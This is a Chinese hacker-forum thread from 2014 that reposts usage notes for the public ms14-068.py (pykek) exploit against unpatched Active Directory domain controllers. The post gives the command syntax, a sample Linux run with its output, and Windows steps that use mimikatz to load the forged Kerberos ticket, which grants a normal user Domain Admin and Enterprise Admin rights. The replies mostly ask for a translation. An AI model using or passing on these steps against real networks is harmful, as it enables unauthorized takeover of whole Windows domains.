搜索
红客联盟 - 由08安全团队运营»社区首页 技术攻防 漏洞情报 MS14-068 privilege escalation PoC
查看: 14606|回复: 7

MS14-068 privilege escalation PoC

[复制链接]
90_
  • TA的每日心情

    2024-11-13 20:06

    • 签到天数: 1628 天

    [LV.Master]伴坛终老
    发表于 2014-12-6 09:20:08 | 显示全部楼层 |阅读模式
    forum:DM_

    http://github.com/bidord/pykek

    ms14-068.py

    Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :

    Domain Users (513)
    Domain Admins (512)
    Schema Admins (518)
    Enterprise Admins (519)
    Group Policy Creator Owners (520)

    USAGE:
    [AppleScript] 纯文本查看 复制代码
    ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> 

OPTIONS: 
    -p <clearPassword> 
--rc4 <ntlmHash> 
Example usage : 

Linux (tested with samba and MIT Kerberos) 

root@kali:~/sploit/pykek# python ms14-068.py -u [email]user-a-1@dom-a.loc[/email] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc 
Password: 
  [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done! 
  [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done! 
  [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done! 
  [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done! 
  [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done! 
  [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done! 
  [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done! 
  [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done! 
  [+] Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'... Done! 
root@kali:~/sploit/pykek# mv [email]TGT_user-a-1@dom-a.loc.ccache[/email] /tmp/krb5cc_0


    On Windows
    [AppleScript] 纯文本查看 复制代码
    python.exe ms14-068.py -u [email]user-a-1@dom-a.loc[/email] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc 
mimikatz.exe "kerberos::ptc [email]TGT_user-a-1@dom-a.loc.ccache[/email]" exit`

    评分

    参与人数 1i币 +16 收起 理由
    C4r1st + 16 感谢分享

    查看全部评分

    回复

    使用道具 举报

    csadsl
  • TA的每日心情
    奋斗
    2017-8-21 09:22

    • 签到天数: 181 天

    [LV.7]常住居民III
    发表于 2014-12-6 09:28:10 | 显示全部楼层
    本地测试一下,但是必须回复

    评分

    参与人数 1i币 +8 收起 理由
    90_ + 8 这是个好习惯~

    查看全部评分

    回复 支持 反对

    使用道具 举报

    C4r1st
  • TA的每日心情
    慵懒
    2022-4-16 15:45

    • 签到天数: 247 天

    [LV.8]以坛为家I
    发表于 2014-12-6 12:11:53 | 显示全部楼层
    域内提权,感谢分享。不过,来点中文好不好,小学生看不懂。
    回复 支持 反对

    使用道具 举报

    super
  • TA的每日心情
    开心
    2016-8-27 01:19

    • 签到天数: 50 天

    [LV.5]常住居民I
    发表于 2014-12-6 14:23:00 | 显示全部楼层
    小学生看不懂英文啊
    回复 支持 反对

    使用道具 举报

    蓝色_
  • TA的每日心情

    2021-9-9 23:35

    • 签到天数: 1 天

    [LV.1]初来乍到
    发表于 2014-12-6 21:04:29 | 显示全部楼层
    求注释= =
    回复 支持 反对

    使用道具 举报

    乐生乐道
  • TA的每日心情
    无聊
    2017-6-1 14:33

    • 签到天数: 97 天

    [LV.6]常住居民II
    发表于 2014-12-8 00:46:32 | 显示全部楼层
    全英文,,,看着有点蛋疼!能不能注解下
    回复 支持 反对

    使用道具 举报

    Mr.wang

    该用户从未签到
    发表于 2014-12-8 09:37:50 | 显示全部楼层
    小学生  看不懂。。。。。
    回复 支持 反对

    使用道具 举报

    birk
  • TA的每日心情

    2015-11-5 16:29

    • 签到天数: 1 天

    [LV.1]初来乍到
    发表于 2014-12-8 20:49:45 | 显示全部楼层
    看了好半天啊
    回复 支持 反对

    使用道具 举报

    返回列表 发帖
    高级模式
    B Color Image Link Quote Code Smilies
    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-22 12:38 , Processed in 0.039018 second(s), 17 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部